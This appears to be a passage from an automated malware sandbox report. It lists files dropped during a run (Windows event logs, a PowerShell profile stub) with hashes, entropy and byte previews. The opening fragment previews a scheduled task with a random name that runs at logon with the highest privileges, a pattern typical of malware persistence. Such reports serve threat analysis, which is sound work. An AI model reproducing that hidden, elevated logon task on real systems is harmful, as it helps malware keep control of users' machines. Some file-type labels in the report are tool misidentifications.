                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.0.9.:.1.4.:.0.9...7.3.6.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.F.H.O.I.a.p.s.b.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Windows\System32\winevt\Logs\Application.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):67544
                                        Entropy (8bit):4.0712678390554755
                                        Encrypted:false
                                        SSDEEP:768:klOIW3Wmdcmbk9nP5tH15QaVhL0KXSvPEsghcVrbk:dc8KPL0KXSvPEs6c1k
                                        MD5:02AA72479E71CFBBA879BC09D5BC4EFC
                                        SHA1:5BA3C7FDA8249DBE10CBEF1505195454D82C11CD
                                        SHA-256:4DD0E9244C9B4396DB449A66AD244CD097EFC67AFF8E0AB2A1835A4323F0F452
                                        SHA-512:6CBC8805BFB296150DFE3F2773C7D30615B88235B955A804B83CA7544F365E4447FF0F3C514AA99D23B870CAB1F5B55D12375C1BA36EAA61F9BBC040C741C7E8
                                        Malicious:false
                                        Preview:ElfChnk.....................................(..........y....................................................................w.lK............$...............................=...........................................................................................$...............................m...............F...........................t...................M...c...........................t...............................................................................................................&.......**..............HLse..............&.....................................................................................!...d.............HLse...........................w.)Ct...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.d.3.4.4.4.3.7.3.3...1.b.b.0...0.1.d.b.1.5.9.3.6.2.1.6.2.4.f.9...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l

                                        C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.844757629881363
                                        Encrypted:false
                                        SSDEEP:384:5he6UHi2uepX7xasnPC3FzFtpFDhFPFyF842xDmSyVflkWiVytr1jSmKbC93ZmLH:5VUHiapX7xadptrDT9W84R9RNdlJEt
                                        MD5:6DD9513F9459922C47E5DA7D177B65ED
                                        SHA1:22141C6315B5E37BF885AA1B2D611BB4A7B85186
                                        SHA-256:EEE9440984A354B116F442B7E64D4754847E667C0A90A6AD38DD990371A09086
                                        SHA-512:3D40609D277197F9249A917D3890960F419CB78B47A68CE5A74A902AC069DBAB781C33A104E21C8A12B5C484EACBB00783FE8F1AC48752C24709B833AAAE5F1C
                                        Malicious:false
                                        Preview:ElfChnk.........H...............H....................u3.......................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...............................................N...........&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 13321401407157305344.000000
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.375898877258491
                                        Encrypted:false
                                        SSDEEP:384:GhzN7UN0HN9NINoNaNxNUN7N+N8NXNINCXNGNXNNaYNXa4NvNhnNFNENNhSNEcNV:GDttjfckEwpQTB1cuat3x9
                                        MD5:C9340739814935979F6E070F71B429C3
                                        SHA1:5D5883156D59CE1BFCCE51E8B05190DACBD63C4D
                                        SHA-256:C73213B06AE8111F7F5E76AA12A63FBD173A2BF1072D07B0D1BEE6C91C722160
                                        SHA-512:23A7490C2F62515367EB614618910117A79AC4A42A0C9815C8194D47F4D8A978DB5A0D1F503BC6B07A2433DB05EB8F7582289AEDF7062C3D1B735049825CF459
                                        Malicious:false
                                        Preview:ElfChnk.x...............x.............................r.....................................................................].B.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................{..........................&.......................MX......]...................................................................**......x.......G.".U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.264354582178037
                                        Encrypted:false
                                        SSDEEP:384:Fh/VNVbVyVgF/WWVnVyVqVmVXV5VX64VX7XjVXEVXVrVX9V6rV67UVjOVsVlVMVi:FeIiXkrtrA
                                        MD5:C6400C7B146761CB15420263DFB8E4D6
                                        SHA1:D76DC09E0EA8585133147E6E8676665559D02266
                                        SHA-256:4296D6D34D230E1E5A8DC9CAF9EC35CC88FC94DA08B97D0DAFDEF75FDCCB615B
                                        SHA-512:840935AC15EBD3C5CE65C564C095B492DB056EA659BFC19C8E22BA7F9F4BF85825D745327F362CDDEEA01866343731943457C3912B89154C57BEEFE205D6E4BD
                                        Malicious:false
                                        Preview:ElfChnk.I.......L.......I.......L...................R........................................................................%C.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..(...I...........W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.213049085236613
                                        Encrypted:false
                                        SSDEEP:384:fh+m3shOg26Qm6mt3m+DmqkTmETiImombmtmgmRmvhmCmGImchm7mBmImwmtmHm2:fNCOg26Dk1TisCzjECrXqm
                                        MD5:C142C52B34FFDA11B1B98479A7FD083A
                                        SHA1:46E3403362EDEE1AA85FA9304DCCF2786938FBD6
                                        SHA-256:EE26845A028E718A3FCB180BB07B1B944DA0C876313A24EDA336A7BAF53D49C9
                                        SHA-512:1198A7AA1C55DD65542CBEA8A567A910645D6A167B02692C5C8E33F9AB40644BE233589181B7F67263324DEB1A661BE95E964607F1C680C7EFC8EDBED5E1E2C7
                                        Malicious:false
                                        Preview:ElfChnk..0.......0.......0.......0...................:8O....................................................................Z...................P.......................x...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...............................)...................................................................**.......0......f6..W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.5175878656905681
                                        Encrypted:false
                                        SSDEEP:96:NxNVaO8sMa3Z85ZML7b2rjjc3Z85ZRp3Z85Zu3Z85ZA3Z85Zu:dV7pp8nMLmvcp8nbp8nup8nAp8n
                                        MD5:029D7554985B090DC6DBFABABE797D2B
                                        SHA1:CE2BADFA905B622CA8393B94D1B37B8BA2C6A5BE
                                        SHA-256:750B5C33A9E92540F700EBFBFABA4ACE63A6F28E5AE563954A5DC86ACD53C641
                                        SHA-512:B830C971334C8358532FC93D3CFBBF09757B3B1F6F7169DEC706D7E23B21B81F43A945187C74E7971B2E86450458B40A952832ECDD43C7EB9577902D7CC6E70D
                                        Malicious:false
                                        Preview:ElfChnk.........................................0...W.......................................................................o.F.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.6213104887740535
                                        Encrypted:false
                                        SSDEEP:768:0PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9hFUKjSxw:wXY5nVYIyyqED5BVZUe7NrVnL3K9fYS
                                        MD5:94CE283335713D796E068233C0D27233
                                        SHA1:8B154CE1AEB28021DFE8B3FE78D322210537769A
                                        SHA-256:619E945769B0AFB1D3097B0FD8D85539C20F3024E47A98CAAB23DCA2F089EE2E
                                        SHA-512:5DAFBD530019133D08737F49D10DFF926CAD9D665588F800D18B6F3321FFB1EF7C7C2D61F0AD30C1084ECD2086D90E7099A7A9E0AADD3DC8AA047B51D75879B6
                                        Malicious:false
                                        Preview:ElfChnk.....................................x...X....#.N........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):72248
                                        Entropy (8bit):2.2795904296119502
                                        Encrypted:false
                                        SSDEEP:384:82oJWoIyLFocoIyhKoloIymGouoIyFLoAoIy1hdo69CcoTorNorWorbvorTorZou:8DmXnEDCo0bcdyR87mVDmXn
                                        MD5:B2617277E4062C404EF94A593A0662E2
                                        SHA1:9E8401F0DA08572A16E10BAA13AD65F447AC09F2
                                        SHA-256:D0C09DAB5161D301D014340AA9CBCB8043F727366A14A439C18F8BE322052909
                                        SHA-512:F517EF84F75BE0D780CC86E8DFF83F47FA0343D7032590CC4B0607E5BEABAF4C55E401B91AA82978EF75DA035D4C285A8D9669FF09B574777BCA7E2937A581D1
                                        Malicious:false
                                        Preview:ElfChnk.........*...............*........... d..Xf.....@.....................................................................Q..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................%5...................................0...............*..............................**......!.........,`...........Z7;................................................................>.......V...=.!..o................,`....g..TW...5l.TW.......H...!....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`.0..................l...............N.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 206.521484
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8818863793721268
                                        Encrypted:false
                                        SSDEEP:384:PhAiPA5PNPxPEPHPhPEPmPSPRP3PoP5PUZPDPBPrPTP:P2N7
                                        MD5:ABC20FF1642044E1CCE03170FDE15383
                                        SHA1:8FA47598A436BFAC1C60AA663BBA85ED65684EB3
                                        SHA-256:335CB1E45B8A1EBDC3714F6744B8AA7332FD8A88C296A4FC03F300D1417CCE8D
                                        SHA-512:262570D8EAB15F9A890B7FFC26B6E6D6615B2659120D7595D2E14A2DB9394EF043B475F1B00239C9E59577821EEC69441C5964D8250CAA7C623FAF497735E839
                                        Malicious:false
                                        Preview:ElfChnk......................................&.. (...........................................................................c..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8732041818438444
                                        Encrypted:false
                                        SSDEEP:384:ihZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+ly:iWXSYieD+tvgzmMvpgNNr/C
                                        MD5:B693B4CC631594D7178A17D644604830
                                        SHA1:010015CDCBAC9449FB75222B3ADAA84725A573E2
                                        SHA-256:2AB6A0ED88C441E535930D7653055EFB046C8E0D20409B95E70F6203B05B770E
                                        SHA-512:2625F3E08A6C17703CD43E2FE6FE6DC8B1096D4BCF3DE77DE75882E923AC278A0F24E21C43644A4909F21E2DF827CDF967C53ECA1D35D18BCAB453309C55546C
                                        Malicious:false
                                        Preview:ElfChnk......................................&...'..... .......................................................................................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................&...................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.23271898573425
                                        Encrypted:false
                                        SSDEEP:384:IhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28n:IbCyhLfI49L
                                        MD5:7519EF202B45BC45640AD3012DD0C940
                                        SHA1:407729CF0DC25506E911AC35557655CFBCD2F36B
                                        SHA-256:8793E9E7F83C6B9EA6233F49E2B9A1C239C27893F13B80E7F16AE18B590D9050
                                        SHA-512:0CF0F7BB4C890A69440309AF564D1D5A17E863933E6FB8A748D95991A96BDC502250689B8F77303AAF0A4199E60D2D9F78C95A84D4314A10008582AE192CA33F
                                        Malicious:false
                                        Preview:ElfChnk.........O...............O....................6~....................................................................b.S.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................n..........n.......................................................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.49826648366803
                                        Encrypted:false
                                        SSDEEP:768:TcMhFBuyKskZljdoKXjtT/r18rQXn8x3F4mLvgpaCm:gMhFBuV
                                        MD5:AB93827437B5DF686B7D01F7C4D83EB5
                                        SHA1:1BE09D7F9A36BE1734B4B96BC0F31EB3CA05E2E9
                                        SHA-256:7BABE1319C38F7CED4F495F293BE61A2CEECAEDCBCABB6286127B8555C259A06
                                        SHA-512:804E69A2314D8DD83104F49BB272E07AAE12CAE3C5582BF6EE259172B4035C29D47DC3BA0278A9F1154DF8E64AA57C0E88D25FE45C372FE2EB5A100573814F5B
                                        Malicious:false
                                        Preview:ElfChnk.........S...............S...............p....v.T......................................................................U.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.792827407520075
                                        Encrypted:false
                                        SSDEEP:768:nVQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaYBnUm3iKLnn4eDB7:0Ht3iKLn
                                        MD5:152A48624B4DFD0D038B4FA3623BA7E7
                                        SHA1:5678AC8B8E8F29A58EA8D43EF57FFF9A6FDAEC28
                                        SHA-256:C4F9B02538E32C9F8583CACBBFA7C43453C03CEFEE70EC5DEB0194E96197BF49
                                        SHA-512:CB23A12137680CFD7B86FE67A4551D33CC727AE1F1EB5EB981D0DB7DB77F2F9A034AE08BEF109FFF080DC98467674369E675B06D768983E4BB15C819F3D4FE8E
                                        Malicious:false
                                        Preview:ElfChnk.........r...............r............... ............................................................................(.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.8858919329531718
                                        Encrypted:false
                                        SSDEEP:384:Nh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDg:NMAP1Qa5AgfQQlke9a6
                                        MD5:B66301CC0555CC995B4374B6FF0F39E5
                                        SHA1:63D7895AAD4EA9BCDAF4D3BFB2911FBC3B316613
                                        SHA-256:C056C5B1E6C58773FC9A75C46E8CC74E855A1620D21D2FF3D0AA34CEA380165C
                                        SHA-512:5A40E2618146D20A0F89943A7155FF211302643CC0D70684CF86363E303D3887625366AF85D5B538C317E70DF3DE30193CE0CE5660FF52756CEF46AFFBBA11FB
                                        Malicious:false
                                        Preview:ElfChnk......................................]...`..*........................................................................c..................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................................U..........&........................................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.428876543896683
                                        Encrypted:false
                                        SSDEEP:384:vKhrEbExnEO4+EUEtEjEXE7LpEn7AEmxEsE27jE/iCESWQHEPEX5EwE2Ex7zEuEq:SfZRLvz75hyME8
                                        MD5:3E00DDA6A4D097354A6D64995B6F5637
                                        SHA1:37446C0346A6195D226249D251E7C8B5D9BA8EE9
                                        SHA-256:47B00BC6744A8886BE9ADAFE8E7C95FF08511038E35F12C66B74643326A29582
                                        SHA-512:1F2E1ABB9AFB705BA7E3C37B8A3DDB3EC180F83F2DBBD82C0AFA95EB37633057D9C5F4F0F76610CAC954FEACB1B7D6223B689A27628B3C69E1223CA216FB4AEC
                                        Malicious:false
                                        Preview:ElfChnk.p...............p....................... .....U.....................................................................w.%e................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...................................E....%......&............;...)...........-..e+.......'...1..................M...........m...........%>..M.......**......p.......Elr W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.462764563871168
                                        Encrypted:false
                                        SSDEEP:384:5hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klc:51T4hImaVqA
                                        MD5:90C7B97351EB8C1E5D63C95F98DA7DC2
                                        SHA1:BCA659CC6F082891275AC1DE0DBCF11874239D97
                                        SHA-256:6E033AC321438132DD42CEF1729149128602226619B68BACC8509AA2C3BF7959
                                        SHA-512:E73206F70E009C1446EA7BA550901B9AF4F43CE0EBDA17DE514E3F55A65264490A24034BCEA90F88C9B0FE6FCED2CF9E970C85E969DB39C9374CF0A2F5AF8F9A
                                        Malicious:false
                                        Preview:ElfChnk.........s...............s...............P...............................................................................................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F................................................|..........&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.543522413880544
                                        Encrypted:false
                                        SSDEEP:384:AhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfk:AzSKEqsMuy6/ij
                                        MD5:A7C99371DDFC5A4213129E4CACAFCBC1
                                        SHA1:DD3ED05CE634AA129B7F1385424AFB489F50C66A
                                        SHA-256:ED6442E39002736D07EE523A96024EB370A0E69A127E042D0EEA7C98F466831C
